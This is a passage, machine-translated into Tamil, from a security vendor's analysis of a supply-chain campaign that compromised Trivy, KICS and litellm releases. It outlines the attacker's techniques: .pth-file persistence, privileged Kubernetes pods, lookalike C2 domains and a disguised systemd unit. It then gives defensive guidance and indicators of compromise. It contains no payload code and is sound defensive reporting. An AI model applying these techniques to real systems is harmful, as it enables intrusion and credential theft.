சாத்தியமான AI உதவி: இந்தச் சான்று சேகரிப்பான், AI-உதவியுடனான கணக்கெடுப்பிற்கு இணக்கமான வகையில், கார்டானோ கையொப்பமிடும் சாவிகள், வயர்கார்டு உள்ளமைவுகள் மற்றும் கனிகோ டாக்கர் சான்றுகள் போன்ற குறிப்பிட்ட இலக்குகள் உட்பட 15-க்கும் மேற்பட்ட பிரிவுகளுடன், ஒரு முறையான விரிவான அமைப்பைக் கொண்டுள்ளது. தரவுச் சுமையின் மீள்செயல் வேகம் (வெவ்வேறு குறியாக்கத் திட்டங்களைக் கொண்ட மூன்று வகைகள்), சூழல் அமைப்புகளுக்கு இடையேயான ஒருங்கிணைப்பு (5 நாட்களில் 5 சூழல் அமைப்புகள்), மற்றும் செயல்பாட்டுப் பாதுகாப்பு (விற்பனையாளரைப் போல் ஆள்மாறாட்டம் செய்யும் டொமைன்கள், கலப்பினக் குறியாக்கம், தொலை அளவீடாக மாறுவேடமிட்ட சிஸ்டம்டி நிலைத்தன்மை) ஆகியவை, AI-உதவியுடனான மேம்பாட்டை ஒரு ஆற்றல் பெருக்கியாகப் பிரதிபலிக்கும் அளவிலான செயல்திறனைக் காட்டுகின்றன. இந்த மதிப்பீடு ஒரு ஊகமே; திறமையான இயக்குநர்கள் AI கருவிகள் இல்லாமலேயே இதே போன்ற அளவை அடைய முடியும்.
புதிய TTP-கள் மற்றும் நுட்பங்கள்
1. பாதுகாப்பு கருவி விநியோகச் சங்கிலி நச்சுத்தன்மை (T1195.002 மாறுபாடு)
கீழ்நிலை இலக்குகளை அடைவதற்கான முதல் படியாக, பாதுகாப்பு ஸ்கேனர்களை (ட்ரிவி, கேஐசிஎஸ்) ஊடுருவுவது ஒரு புதிய தீவிர நடவடிக்கையாகும். தாக்குதல் நடத்தியவர் ஒரு லைப்ரரியை மட்டும் ஊடுருவவில்லை — நிறுவனங்கள் பயன்படுத்தும் கருவிகளையே அவர்கள் ஊடுருவியுள்ளனர். கண்டறிய பாதிக்கப்பட்ட நூலகங்கள். இது ஒரு பார்வைப் புலப்படாத நிலையை உருவாக்குகிறது: தீங்கிழைக்கும் குறியீட்டைக் கண்டறிய வேண்டிய ஸ்கேனரே, அதை வழங்கும் பொறிமுறையாகவும் இருக்கிறது.
2. பைதான் .pth கோப்பு நிலைத்தன்மை (T1546)
தி litellm_init.pth பதிப்பு 1.82.8-இல் உள்ள நுட்பம் குறிப்பாக வஞ்சகமானது. பைதான் .pth கோப்புகள் site-packages/ ஒவ்வொரு மொழிபெயர்ப்பி தொடக்கத்திலும் செயலாக்கப்படுகின்றன; தொடங்கும் எந்த வரியும் import குறியீடாகச் செயல்படுத்தப்படுகிறது. பேலோடை ஒரே சங்கிலித் தொடராக இணைப்பதன் மூலம் import இந்தக் கூற்றின்படி, தாக்குதல் நடத்துபவர் litellm இறக்குமதி செய்யப்படும்போது மட்டுமல்லாமல், ஒவ்வொரு பைதான் செயல்முறையிலும் செயலாக்கத்தை அடைகிறார். இதன் பொருள், litellm நிறுவப்பட்டிருந்தாலும் ஒருபோதும் பயன்படுத்தப்படாவிட்டாலும் கூட, அந்தத் தாக்குதல் நிரல் செயல்படுகிறது, மேலும் சமரசம் செய்யப்பட்டதை மாற்றும் சரிசெய்தலையும் அது தாங்கிக்கொள்கிறது. .py சரிபார்க்காமல் கோப்புகள் .pth கோப்புகளை.
3. சிறப்புரிமை பெற்ற பாட் வரிசைப்படுத்தல் வழியாக குபெர்னெட்டஸ் கிளஸ்டர் முழுவதுமான பக்கவாட்டு நகர்வு (T1610, T1611)
ஒவ்வொரு கிளஸ்டர் முனையத்திலும் சிறப்புரிமை பெற்ற பாட்களைத் தானியங்கி முறையில் உருவாக்குதல் — hostPID, hostNetwork, ஹோஸ்ட் கோப்பு முறைமை மவுண்ட், மற்றும் chroot ஒற்றை சமரசம் செய்யப்பட்ட பணிச்சுமையை முழு கிளஸ்டர் சமரசமாக மாற்றுவதற்கு, நிலைத்தன்மையை நிறுவுதல் — கண்டெய்னர் வரிசைப்படுத்தலை (T1610) ஹோஸ்டுக்கு தப்பித்தல் (T1611) உடன் சங்கிலித் தொடராக இணைக்கிறது.
4. விற்பனையாளரைப் போல் ஆள்மாறாட்டம் செய்யும் C2 உள்கட்டமைப்பு
பயன்படுத்தி models.litellm.cloud (எழுத்துருவைப் போல) மற்றும் checkmarx.zone (செக்மார்க்ஸைப் போல) C2/வெளியேற்ற முனையங்களாக இருப்பது, பிணையக் கண்காணிப்பைத் தவிர்ப்பதற்காக வடிவமைக்கப்பட்டுள்ளது. வெளியேறும் தரவுப் போக்குவரத்தை மதிப்பாய்வு செய்யும் SOC ஆய்வாளர்கள், முறையான விற்பனையாளர் டொமைன்கள் போல் தோற்றமளிக்கும் இடங்களுக்கான HTTPS இணைப்புகளைக் காண்பார்கள்.
5. பயணத்தின் போதே பேலோடை விரைவாக மாற்றி அமைத்தல்
முதலில் v1.82.7 பதிப்பை இறக்குமதி நேரச் செயலாக்கத்துடனும், பின்னர் 13 நிமிடங்கள் கழித்து v1.82.8 பதிப்பைத் தொடக்க நேரச் செயலாக்கத்துடனும் வெளியிடுவது, தாக்குதல் நடத்துபவர் நிகழ்நேரத்தில் கண்காணித்துத் தன்னை மாற்றியமைத்துக் கொள்வதைக் காட்டுகிறது. மூலக் குறியீட்டில் பாதுகாக்கப்பட்டுள்ள, கருத்துரைக்கப்பட்ட பேலோட் வகைகள் (வெவ்வேறு குறியாக்கத் திட்டங்களுடன்) செயல்பாட்டின் போது தீவிரமான மேம்பாட்டுப் பணிகள் நடைபெற்றதை உறுதிப்படுத்துகின்றன.
என்ன செய்ய முடியும்
இந்தத் தாக்குதல் ஒவ்வொரு மட்டத்திலும் உள்ள நம்பிக்கையைச் சுரண்டுகிறது: பாதுகாப்பு கருவிகள் மீதான நம்பிக்கை, தொகுப்பு பதிவகங்கள் மீதான நம்பிக்கை, பரிச்சயமான டொமைன்கள் மீதான நம்பிக்கை, CI/CD தானியக்கம். அதைத் தடுப்பதற்கு, இந்த நம்பிக்கை எல்லைகள் ஒவ்வொன்றையும் வலுப்படுத்த வேண்டும்:
தொகுப்பு நுகர்வோருக்காக
- சார்புகளை வெறும் பதிப்பின் மூலம் மட்டுமல்ல, ஹாஷ் மூலமும் நிலைநிறுத்தவும்.
pip install litellm==1.82.6 --hash=sha256:...சமரசம் செய்யப்பட்ட பதிப்புகள் சிறிது நேரத்திற்கு சமீபத்திய பதிப்பாகத் தோன்றினாலும், அவை நிறுவப்படுவதைத் தடுத்திருக்கும். - லாக்ஃபைல்களைப் பயன்படுத்தவும்.
pip-compile,poetry.lock, மற்றும்uv.lockதுல்லியமான பதிப்புகளையும் ஹாஷ்களையும் கைப்பற்றுங்கள். CI/CD ஃப்ளோட்டிங் பதிப்பு விவரக்குறிப்புகளிலிருந்து அல்லாமல், லாக்ஃபைல்களிலிருந்து நிறுவ வேண்டும். - கண்காணிக்கவும்
.pthகோப்புகளை. தொடர்ந்து தணிக்கை செய்யுங்கள்site-packages/எதிர்பாராததற்கு.pthகோப்புகள் — அவை ஒவ்வொரு பைதான் தொடக்கத்திலும் இயங்குகின்றன, மேலும் அவை போதிய அளவு அங்கீகரிக்கப்படாத ஒரு நிலைத்தன்மைப் பொறிமுறையாகும். - வெளிச்செல்லும் வலையமைப்புக் கட்டுப்பாடுகளைச் செயல்படுத்தவும். வெளியேற்றம்
models.litellm.cloudமற்றும் C2 வாக்கெடுப்புcheckmarx.zoneஉற்பத்திச் சூழல்களில் அனுமதிப்பட்டியல் அடிப்படையிலான வெளிச்செல்லும் வடிகட்டுதலில் இது பிடிபட்டிருக்கலாம்.
தொகுப்பு பராமரிப்பாளர்களுக்கு
- முள் CI/CD செயல்கள் மூலம் commit SHA, tag அல்ல. லைட்எல்எல்எம்-இன் pipeline நிலைநிறுத்தப்பட்ட பதிப்பு இல்லாமல் டிரிவியைப் பயன்படுத்தியது. அது மேற்கோள் காட்டியிருந்தால்
aquasecurity/trivy-action@<commit-sha>அதற்கு பதிலாக@latestஅவ்வாறு நடந்திருந்தால், சமரசம் செய்யப்பட்ட அந்த நடவடிக்கை செயல்படுத்தப்பட்டிருக்காது. - குறுகிய கால, வரையறுக்கப்பட்ட வெளியீட்டு டோக்கன்களைப் பயன்படுத்தவும். PyPI, நம்பகமான வெளியீட்டாளர்களையும் (OIDC-அடிப்படையிலான) மற்றும் வரையறுக்கப்பட்ட API டோக்கன்களையும் ஆதரிக்கிறது. வெளியேற்றப்பட்ட
PYPI_PUBLISHடோக்கனுக்கு நீண்ட கால, கட்டுப்பாடற்ற வெளியீட்டு அணுகல் இருந்திருக்கக் கூடாது. - PyPI இல் இரு காரணி அங்கீகாரத்தைச் செயல்படுத்துங்கள். அனைத்து பராமரிப்பாளர்களுக்கும் 2FA-ஐக் கட்டாயமாக்குங்கள் மற்றும் முடிந்தவரை வன்பொருள் பாதுகாப்புச் சாவிகளைப் பயன்படுத்துங்கள்.
- பொதிகளில் கையொப்பமிடுங்கள். Sigstore/PEP 740 சான்றளிப்புகள், ஒரு தொகுப்பு எதிர்பார்க்கப்பட்ட முறையில் உருவாக்கப்பட்டது என்பதை நுகர்வோர் சரிபார்க்க அனுமதிக்கின்றன. CI/CD pipelineதிருடப்பட்ட டோக்கனைக் கொண்ட தாக்குபவரால் அல்ல.
பிளாட்ஃபார்ம் ஆபரேட்டர்களுக்கு (PyPI, npm, GitHub)
- இயல்புக்கு மாறான வெளியீட்டு முறைகளைக் கண்டறியவும். வழக்கத்தை விட வேறுபட்ட ஐபி அல்லது டோக்கனிலிருந்து, 13 நிமிட இடைவெளியில் வெளியிடப்படும் இரண்டு புதிய பதிப்புகள், அந்தத் தொகுப்பு நிறுவப்படுவதற்கு முன்பு, மதிப்பாய்வுக்காக நிறுத்திவைத்தல் அல்லது தானியங்கு ஸ்கேனிங்கைத் தூண்ட வேண்டும்.
- நம்பகமான வெளியீட்டாளர்களின் பயன்பாட்டை விரைவுபடுத்துங்கள். OIDC அடிப்படையிலான வெளியீடானது, தொகுப்புகளைக் குறிப்பிட்ட களஞ்சியங்கள் மற்றும் பணிப்பாய்வுகளுடன் பிணைப்பதால், திருடப்பட்ட டோக்கன்கள் அசல் தொகுப்பிற்கு வெளியே பயனற்றதாகிவிடுகின்றன. CI/CD சூழல்.
- வெளியிடும் நேரத்தில் தீம்பொருள் ஸ்கேனிங்கைச் செயல்படுத்தவும். proxy_server.py இல் உள்ள base64-டிகோட் செய்யப்பட்ட பேலோடை, வெளியிடும் நேரத்தில் நிலையான பகுப்பாய்வு மூலம் கண்டறிய முடியும்.
சுற்றுச்சூழல் அமைப்புக்கு
- பாதுகாப்புக் கருவிகளை முக்கிய உள்கட்டமைப்பாகக் கருதுங்கள். டிரிவி மற்றும் செக்மார்க்ஸ் கேஐசிஎஸ் மில்லியன் கணக்கானோரால் பயன்படுத்தப்படுகின்றன. pipelineஅவர்கள் ஸ்கேன் செய்யும் பேக்கேஜ்களைப் போலவே, அவர்களின் GitHub Actions-ம் கையொப்பமிடப்பட்டு, பின் செய்யப்பட்டு, அதே கண்டிப்புடன் கண்காணிக்கப்பட வேண்டும்.
- இயக்க நேரக் கண்டறிதலில் முதலீடு செய்யுங்கள். நிலையான பகுப்பாய்வு மட்டும் ஒவ்வொரு மறைப்பு நுட்பத்தையும் கண்டறிய முடியாது. தொகுப்பு நிறுவலின் இயக்க நேரக் கண்காணிப்பு hooksஎதிர்பாராத பிணைய இணைப்புகள் மற்றும் சந்தேகத்திற்கிடமான கோப்பு அணுகல் முறைகள் ஆகியவை ஆழமான பாதுகாப்பை வழங்குகின்றன.
- அச்சுறுத்தல் தொடர்பான தகவல்களை விரைவாகப் பகிரவும். பல்வேறு வழங்குநர்களுக்கிடையேயான ஒருங்கிணைப்பு வேகமாக இருந்திருந்தால், litellm-க்கான 5.5 மணி நேர வெளிப்பாட்டுக் காலம் இன்னும் குறைவாக இருந்திருக்கலாம். Xygeni MEW, Socket மற்றும் Snyk போன்ற தானியங்கு ஸ்கேனிங் சேவைகள் இந்தக் கோளாறைக் கண்டறிந்தன — மனித உறுதிப்படுத்தல் மற்றும் பதிவகத்தின் பதிலளிப்பு நேரமே இதில் உள்ள முட்டுக்கட்டையாகும்.
தீர்மானம்
டீம்பிசிபி பிரச்சாரம் ஒரு திருப்புமுனை தருணம் software supply chain securityமுதலில் பாதுகாப்பு ஸ்கேனர்களின் பாதுகாப்பை மீறி, அவற்றை உயர் மதிப்புள்ள செயற்கை நுண்ணறிவு உள்கட்டமைப்பிற்கான படிக்கட்டுகளாகப் பயன்படுத்துவதன் மூலம், விநியோகச் சங்கிலியானது அதன் மிகவும் பலவீனமான இடைவழிச் சார்புநிலையைப் பொறுத்தே வலிமையாக இருக்கும் என்பதையும், அந்தச் சார்புநிலையே உங்களைப் பாதுகாப்பாக வைத்திருக்க நீங்கள் நம்பக்கூடிய ஒரு பாதுகாப்புக் கருவியாக இருக்கக்கூடும் என்பதையும் தாக்குதல் நடத்தியவர்கள் நிரூபித்துள்ளனர்.
லிட்டெல்ம் சமரசம், AI உள்கட்டமைப்பிற்கு அதிகரித்து வரும் அபாயத்தை குறிப்பாக எடுத்துக்காட்டுகிறது. LLM ப்ராக்ஸி கேட்வேக்கள் ஆகும்போது standard மாதிரிக்கான enterprise செயற்கை நுண்ணறிவைப் பயன்படுத்தும்போது, API சாவிகள், கிளவுட் அங்கீகாரச் சான்றுகள் மற்றும் முக்கியமான தரவுகளுக்கான அணுகலை ஒரே கூறில் அவர்கள் ஒருமுகப்படுத்துகிறார்கள். அந்தக் கூறின் பாதுகாப்பை மீறுவது, முழு செயற்கை நுண்ணறிவு அடுக்குக்குமான ஒரு திறவுகோலாக அமைந்துவிடும்.
5.5 மணி நேர கால இடைவெளியில் litellm 1.82.7 அல்லது 1.82.8-ஐ நிறுவிய நிறுவனங்கள், இதை ஒரு முழுமையான நற்சான்றிதழ் மீறலாகக் கருத வேண்டும்: பாதிக்கப்பட்ட கணினிகளில் உள்ள அனைத்து இரகசியங்களையும் மாற்றவும், Kubernetes கிளஸ்டர்களைத் தணிக்கை செய்யவும். node-setup-* காய்களில் kube-systemஎதையும் அகற்றவும் sysmon.service systemd அலகுகளைச் சரிபார்க்கவும். litellm_init.pth பைத்தானில் site-packages/ கோப்பகங்கள். அதிகாரப்பூர்வ டாக்கர் இமேஜின் பயனர்கள் (ghcr.io/berriai/litellmபிம்பம் அதன் சார்புகளை நிலைநிறுத்திக் கொண்டதாலும், வெளிப்பாட்டுக் காலத்தின் போது அது மீண்டும் உருவாக்கப்படாததாலும், அவை பாதிக்கப்படவில்லை.
எழுத்தாளர் பற்றி
இணை நிறுவனர் & CTO
லூயிஸ் ரோட்ரிக்ஸ் இவர் Xygeni Security நிறுவனத்தின் இணை நிறுவனர் மற்றும் தலைமை தொழில்நுட்ப அதிகாரி ஆவார். பயன்பாட்டுப் பாதுகாப்பில் 20 ஆண்டுகளுக்கும் மேலான அனுபவமுள்ள இவர், குழுக்கள் உண்மையான விநியோக அபாயத்தைக் குறைக்க உதவும் AppSec பாதுகாப்பு மற்றும் மேம்பட்ட குறியீடு-பகுப்பாய்வுத் திறன்களில் கவனம் செலுத்துகிறார்.




